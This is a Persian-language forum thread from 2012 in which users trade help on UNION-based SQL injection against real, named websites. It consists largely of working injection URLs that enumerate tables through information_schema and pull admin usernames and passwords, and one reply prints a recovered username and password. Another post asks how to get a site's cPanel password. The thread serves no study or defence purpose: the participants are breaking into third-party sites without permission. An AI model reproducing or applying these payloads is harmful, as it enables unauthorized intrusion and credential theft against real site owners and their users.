+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+--- موضوع: sql-injection (/showthread.php?tid=2372)
صفحات
1
2
sql-injection - امیر - 06-06-2012
درود:
دوستان من به یک موضوع در حمله sql برخوردم من تا این جا میرم دیگه گیر میکنم اگه میشه خودتون جواب بدین و ادرس سایت یا .. ندین
1-من تعداد column ها رو بدست اوردم
2-column اسیب پذیر رو بدست اوردم
3-ورژن 5 هست
4-بدست اوردن نام تیبل رو نمیدونم
5-بعد بلدم
فقط 4 رو مشکل دارم میشه کمکم کنید
RE: sql-injection - Amin_Mansouri - 06-06-2012
پست زیر رو ببین
با مثال همه توضیح داده شده
http://parsicoders.com/showthread.php?tid=2363&pid=6888#pid6888
RE: sql-injection - nimaarek - 06-06-2012
نقل قول:یعنی چی نمیدونی ؟!
4-بدست اوردن نام تیبل رو نمیدونم
کاملتر توضیح بده ، بعدش یه سوال معمولا اول table ها رو در می ارن بعدش colum رو چطوریه که شما colum رو داری بعد table رو نداری ؟ :d
RE: sql-injection - امیر - 06-06-2012
درود:
امین جان
گفتم ادرس نده فقط یک کلمه جواب می خوام بدشم لینک خراب بور اصلا سایتی باز نشد منظورم این است که
http://c2-europe.eu/news-full.php?id=-50+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14+from+admin--
این رو دیروز داشتم هکش میکردم البته شانسی بود و شانسی admin در اومد اما چند تا دیگه بود نتونستم اسم تیبل رو حدس بزنم حتی از این راه هم رفتم اما به نتیجه نرسیدم
http://www.placeanad.ru/index.php?id_typ=-254+union+select+1,2,3,4,5,6,unhex%28hex%28group_concat%28localhost%29%29%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.columns--
مثلا
این رو نام تیبل ها رو به دست اوردم اما در اخرین قسمت کد یعنی from n----n که قرار میدم ارور میده مشکل من تو به دست اودن تیبل اخره
چی گفتم دقیقا کی حالیش شد ؟
RE: sql-injection - nimaarek - 06-06-2012
نقل قول: http://c2-europe.eu/news-full.php?id=-50+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14+from+admin--راجع به این باید بگم که username و password روی تیبل های آسیب پذیر نمیزاشتی درستش اینطوری میشه :
http://c2-europe.eu/news-full.php?id=-50+union+select+1,2,3,4,password,6,username,8,9,10,11,12,13,14+from+admin--
که پسورد میاد جای 5 که میشه :
5ejufe
و یوزر جای 7 که میشه :
michael
واسه بعدی هم باید از اول تست کنم که زمان میبره باید کمی صبر کنی چون فردا امتحان دارم :-d
RE: sql-injection - امیر - 06-07-2012
درود:
دوستان دقت نکردید چه گفتم منظورم این هست که نام تیبل رو که ازش می خوهم اطلاعات بدس بیاریم رو نمیدونم چی کار باید بکنم (من خودم شانسی یا حدس میزنم ) روشی وجود داره که خودش نام تیبل ها رو بگه v5 و بالاتر
درود:
ادمین پیج پیدا نشد اما cpanel سایت پیدا شد اما پسورد cpanel فرق میکرد پسورد cpanel رو از کجا بدست بیارم
RE: sql-injection - nimaarek - 06-07-2012
این اولی چرا بایپس نمیشه !!!!! عصابم و خورد کرد کسی تونسته ؟
RE: sql-injection - nimaarek - 06-09-2012
این http://c2-europe.eu که اصلا راه بده نیست !
ولی اونیکی ورژن دیتابیس کمتر از 5 هست یعنی اینکه دیگه چیزی به اسم information_schema نداریم و شما باید تیبل ها و کلوم ها رو حدس بزنی
RE: sql-injection - امیر - 06-10-2012
درود:
به طور مثال شما این تارگت رو که من دادی چجوری تیبلش رو پیدا کردی
http://www.site.ir/modules.php?option=comnews&do=view&id=-1157+union+select+1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16+from+memb%E2%80%8Ber_tb
member_tb
رو میگم .
RE: sql-injection - nimaarek - 06-10-2012
اونکه مثل هلو هست :d
چون ورژن دیتابیس 5 به بالا هست فایل information_schema وجود داره پس "
تیبل:
کد:
http://www..****..ir/modules.php?option=comnews&do=view&id=-1157+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tablesکلومن:
کد:
http://www.****.ir/modules.php?option=comnews&do=view&id=-1157+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns